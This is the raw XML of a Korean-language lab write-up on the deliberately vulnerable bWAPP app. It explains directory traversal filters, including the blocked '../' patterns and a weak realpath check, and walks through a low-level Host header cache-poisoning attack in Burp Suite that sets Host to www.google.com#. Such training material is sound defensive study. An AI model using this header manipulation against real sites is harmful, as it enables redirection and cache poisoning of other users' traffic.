          <w:p w14:paraId="7A51CC51" w14:textId="5A9FCA87" w:rsidR="009E4377" w:rsidRPr="0035631E" w:rsidRDefault="009E4377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F297708" w14:textId="75C37042" w:rsidR="009E4377" w:rsidRPr="0035631E" w:rsidRDefault="009E4377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6A84F9F2" wp14:editId="01134E34">
                  <wp:extent cx="6840001" cy="299975"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2413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299975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B56C9" w14:textId="638DB154" w:rsidR="009E4377" w:rsidRPr="0035631E" w:rsidRDefault="00A155B8" w:rsidP="00341A30">
            <w:pPr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$ </w:t>
            </w:r>
            <w:r w:rsidR="009E4377"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Vi /var/www/bWAPP/directory_traversal_1.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD07C0E" w14:textId="77777777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FCB3379" w14:textId="0F76EC54" w:rsidR="00735CB9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6E6D94AA" wp14:editId="51EBA4F7">
                  <wp:extent cx="6840001" cy="6538849"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="146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6538849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D8C65" w14:textId="77777777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109501D" w14:textId="77777777" w:rsidR="00A155B8" w:rsidRPr="0035631E" w:rsidRDefault="00A155B8" w:rsidP="00A155B8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해당 페이지 파일의 show_file() 함수 코드 부분이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D535AA8" w14:textId="77777777" w:rsidR="00A155B8" w:rsidRPr="0035631E" w:rsidRDefault="00A155B8" w:rsidP="00A155B8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인자로 받은 $file 변수의 값의 파일을 읽어 페이지에 출력한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC5FB2C" w14:textId="2E2BDAAC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370C5F5" w14:textId="36F09BD3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02806687" wp14:editId="34BA45F6">
                  <wp:extent cx="6840001" cy="5640093"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="177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5640093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6CDA3" w14:textId="4B9356B0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7EEE97ED" wp14:editId="2B0F1B29">
                  <wp:extent cx="6840001" cy="5633528"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2476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5633528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7744D" w14:textId="1EEB4A1E" w:rsidR="00E67AD9" w:rsidRPr="0035631E" w:rsidRDefault="00E67AD9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7FC8A0A" w14:textId="0FBED04F" w:rsidR="00AC7F7A" w:rsidRPr="0035631E" w:rsidRDefault="00E56F5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 w:rsidR="00E67AD9" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">irectory_traversal_1.php </w:t>
            </w:r>
            <w:r w:rsidR="00E67AD9"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페이지의 소스코드를 확인하면 </w:t>
            </w:r>
            <w:r w:rsidR="00E67AD9" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">directory_traversal_check_3 </w:t>
            </w:r>
            <w:r w:rsidR="00E67AD9" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>함수를 사용하여 변수에 입력한 데이터가 올바른 데이터인지 검사한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3BB715" w14:textId="55BF8630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2FBDF9DE" wp14:editId="497FE342">
                  <wp:extent cx="6840001" cy="5796983"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="1333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1" cy="5796983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06D0F" w14:textId="5F8AE851" w:rsidR="00A155B8" w:rsidRPr="0035631E" w:rsidRDefault="00A155B8" w:rsidP="00341A30">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(/var/www/bWAPP/functions_external.php)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E47400C" w14:textId="03F0AE19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35394A1" w14:textId="3673DB3D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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB58C3D" wp14:editId="612A6669">
                  <wp:extent cx="6840001" cy="4483768"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="1206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4483768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D9E81" w14:textId="77777777" w:rsidR="00A155B8" w:rsidRPr="0035631E" w:rsidRDefault="00A155B8" w:rsidP="00A155B8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(/var/www/bWAPP/functions_external.php)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FAE7CA6" w14:textId="7546705C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A516DCA" w14:textId="675125A3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위 코드는 난이도 중/상에서 적용되는 필터링 함수 directory_traversal_check_1(), directory_traversal_check_3() 함수의 코드 부분이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0585B0A6" w14:textId="69C14F6E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902D5E2" w14:textId="32AA5CFB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난이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도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low에서는 GET 방식으로 받은 directory 파라미터 변수의 값을 인자로 show_file() 함수를 호출한다. 별다른 필터링을 적용하지 않기 때문에 Directory Traversal 공격에 취약하다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD407DC" w14:textId="77777777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D3E44B6" w14:textId="2E46BD3A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난이도 medium에서는 directory_traversal_check_1() 함수를 통해 입력값을 필터링하고 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DEC006" w14:textId="77777777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functions_external.php 파일에서 directory_traversal_check_1() 함수를 확인해보면 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>'../', '..\\', '/..', '\..' 문자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를 필터링하는 것을 확인할 수 있다. Directory Traversal 공격에 사용되는 특수문자를 필터링함으로써, 다른 디렉터리에 있는 파일에 접근하지 못하도록 막고 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24799214" w14:textId="77777777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6E5D252" w14:textId="7360DCA0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난이도</w:t>
            </w:r>
            <w:r w:rsidR="00081D1F"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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>h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igh에서는 directory_traversal_check_3() 함수를 통해 입력값 필터링을 거치고</w:t>
            </w:r>
            <w:r w:rsidR="00E56F58" w:rsidRPr="0035631E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>베이스 디렉터리 설정($base_path)까지 해주고 있다. functions_external.php 파일에서 directory_traversal_check_3() 함수를 확인해보면, 절대 경로를 반환하는 realpath() 함수를 사용하여 설정한 베이스 디렉터리의 절대 경로와 사용자가 입력한 디렉터리의 절대 경로가 일치하는지 확인하고 있다. 하지만 directory_traversal_check_3() 함수에 베이스 디렉터리 설정 인자를 지정해주지 않아, 사실상 난이도 중과 취약점 대응 정도가 같다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C27174" w14:textId="77777777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D4D5C6D" w14:textId="77777777" w:rsidR="00E06B40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위와 같이 난이도 </w:t>
            </w:r>
            <w:r w:rsidR="00E06B40" w:rsidRPr="0035631E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="00E06B40" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>edium/high</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에서처럼 디렉터리를 이동할 수 있는 특수문자를 필터링함으로써 허용되지 않은 디렉터리/파일에 대한 접근을 어느 정도 막을 수 있다. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53872490" w14:textId="4108E531" w:rsidR="00AC7F7A" w:rsidRPr="0035631E" w:rsidRDefault="00AC7F7A" w:rsidP="00AC7F7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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>만약 접근을 허용하고자 하는 파일/확장자가 정해져 있다면 화이트리스트 방식으로 접근을 제어하는 것이 좋은 방법이 될 것이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="336E4E94" w14:textId="0E70FD34" w:rsidR="00A155B8" w:rsidRPr="0035631E" w:rsidRDefault="00A155B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9D507E" w:rsidRPr="0035631E" w14:paraId="771373BC" w14:textId="77777777" w:rsidTr="009D507E">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="360" w:type="dxa"/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05144E7B" w14:textId="77777777" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="009D507E" w:rsidP="00341A3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28ECB21" wp14:editId="3B1370AE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3F166" id="직사각형 27" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550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NRtA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zbqjUb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9D507E" w:rsidRPr="0035631E" w14:paraId="3D30C297" w14:textId="77777777" w:rsidTr="009D507E">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="360" w:type="dxa"/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404BF632" w14:textId="3925CAFC" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="009D507E" w:rsidP="009D507E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</w:rPr>
              <w:lastRenderedPageBreak/>
              <w:br w:type="page"/>
            </w:r>
            <w:bookmarkStart w:id="11" w:name="C2"/>
            <w:bookmarkEnd w:id="11"/>
            <w:r w:rsidR="008A7C7B"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fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008A7C7B"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instrText xml:space="preserve"> HYPERLINK  \l "C1" </w:instrText>
            </w:r>
            <w:r w:rsidR="008A7C7B"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</w:r>
            <w:r w:rsidR="008A7C7B"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fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r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72"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r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Pr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>H</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>ost He</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>der Attack(Cache Poisoning)</w:t>
            </w:r>
            <w:r w:rsidR="008A7C7B" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D507E" w:rsidRPr="0035631E" w14:paraId="0566AE4B" w14:textId="77777777" w:rsidTr="0074270C">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="360" w:type="dxa"/>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E2C727B" w14:textId="77777777" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="009D507E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BBE8A4D" w14:textId="36E27C74" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58" w:rsidP="00341A30">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[ 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>H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ost Header Attack(Cache Poisoning)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난이도 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 xml:space="preserve">: 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>l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ow ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A60050" w14:textId="39A50BB2" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58" w:rsidP="00341A30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9D507E" w:rsidRPr="0035631E" w14:paraId="658DE116" w14:textId="77777777" w:rsidTr="006500C1">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="360" w:type="dxa"/>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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2E592" w14:textId="67F90FD3" w:rsidR="009D507E" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58" w:rsidP="00341A30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5631E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BA8EC3B" wp14:editId="32A7A4BC">
                  <wp:extent cx="6840001" cy="1043257"/>
                  <wp:effectExtent l="0" t="0" r="0" b="508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1" cy="104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D95F7" w14:textId="0A22518B" w:rsidR="00735CB9" w:rsidRPr="0035631E" w:rsidRDefault="00756DD0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"here" 텍스트를 클릭하면 비박스 홈으로 돌아가게 되는 링크만 있는 페이지</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 나온다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619F07A1" w14:textId="77777777" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="0053347F" w:rsidP="008335CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC2B827" w14:textId="43EF2B06" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="00180F3C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2C858E34" wp14:editId="4DF3FD45">
            <wp:extent cx="6840001" cy="2336497"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="260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33649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20AF3B" w14:textId="6F80ADA3" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="0053347F" w:rsidP="0053347F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B</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>urp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Intercept -&gt; intercept is on</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 변경하고 새로고침한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A170AE" w14:textId="4D6CACA2" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="0053347F" w:rsidP="0053347F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBBF7DD" w14:textId="30CE4A53" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="0053347F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687C55DA" wp14:editId="43542EA0">
            <wp:extent cx="6840001" cy="2280000"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2540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28000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3DCE83" w14:textId="06BBD901" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="0053347F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Host Heaader</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 확인한다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE00DD" w14:textId="369241D9" w:rsidR="00756DD0" w:rsidRPr="0035631E" w:rsidRDefault="00756DD0" w:rsidP="008335CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9AEB1A" w14:textId="053A27F4" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="0053347F" w:rsidP="008335CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6398452E" w14:textId="77EF9D5C" w:rsidR="0053347F" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88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7CDB4A4C" wp14:editId="67BEF5C7">
            <wp:extent cx="6840001" cy="2299385"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2476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299385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BA999" w14:textId="3E74CFC7" w:rsidR="0075068E" w:rsidRPr="0035631E" w:rsidRDefault="00536A55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H</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ost Header</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidR="00F35A88" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00F35A88" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ww.google.com#</w:t>
      </w:r>
      <w:r w:rsidR="00F35A88" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변경하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Forward</w:t>
      </w:r>
      <w:r w:rsidR="0075068E" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r w:rsidR="0075068E" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0075068E" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭해준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2253DACA" w14:textId="14A69DCB" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88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7664EB6C" wp14:editId="396E72FB">
            <wp:extent cx="6840001" cy="2176958"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="139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17695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ABD0C1" w14:textId="04D78667" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88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F</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>orward</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 계속 클릭해 준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4BCEB8" w14:textId="22060CAA" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88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1A196A29" wp14:editId="56C282E4">
            <wp:extent cx="6840001" cy="3311512"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2286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331151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464C90" w14:textId="26DADFD6" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="00F35A88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F</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>orward</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 넘겨주다 보면 위와</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 같이 페이지가 깨지는 것을 확인할 수 있는데,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F4311E" w14:textId="77777777" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="00F35A88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이는</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS 파일을 불러올 때, Host 헤더의 값을 참조하여 가져오기 때문이라고 판단할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D209598" w14:textId="77777777" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="008335CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50736425" w14:textId="6F3332E1" w:rsidR="00536A55" w:rsidRPr="0035631E" w:rsidRDefault="00536A55" w:rsidP="008335CD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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4629A46F" wp14:editId="4D9DD447">
            <wp:extent cx="6840001" cy="3320582"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="133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3320582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76380F" w14:textId="00A0C931" w:rsidR="00711A95" w:rsidRPr="0035631E" w:rsidRDefault="00536A55" w:rsidP="00711A95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‘intercept is on’</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 클릭하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 전환</w:t>
      </w:r>
      <w:r w:rsidR="00F35A88" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 후 </w:t>
      </w:r>
      <w:r w:rsidR="00F35A88" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">‘here’ </w:t>
      </w:r>
      <w:r w:rsidR="00F35A88" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>링크를 클릭해 준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335302F1" w14:textId="12A49C7D" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="00711A95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50142A95" w14:textId="3D773B75" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="00711A95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49C5E3C1" wp14:editId="11A12185">
            <wp:extent cx="6840001" cy="1916718"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="266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916718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DFF3ED" w14:textId="7EE0D002" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="00F345F6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정상적으로 구글로 접속되는 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198DAC2" w14:textId="300D0C09" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F937AA6" w14:textId="57D53A26" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
